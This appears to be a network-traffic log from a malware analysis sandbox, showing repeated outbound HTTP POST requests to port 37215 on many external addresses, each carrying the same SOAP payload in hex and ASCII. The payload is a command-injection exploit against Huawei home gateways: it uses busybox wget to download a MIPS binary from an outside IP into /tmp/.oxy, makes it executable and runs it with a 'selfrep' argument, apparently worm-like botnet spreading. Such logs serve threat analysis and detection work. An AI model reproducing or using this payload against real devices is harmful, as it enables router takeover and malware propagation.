                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  555192.168.2.1336128197.114.91.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123275042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  556192.168.2.1357304157.36.18.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123783112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  557192.168.2.133762241.4.28.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123784065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  558192.168.2.1352724157.203.205.3837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123820066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  559192.168.2.1332988157.174.31.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123820066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  560192.168.2.1359062157.115.138.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.123830080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  561192.168.2.1359332197.68.32.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.124819040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  562192.168.2.1351940197.204.152.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.124821901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  563192.168.2.1342360126.190.6.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.124852896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  564192.168.2.1358930197.110.135.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.124861002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 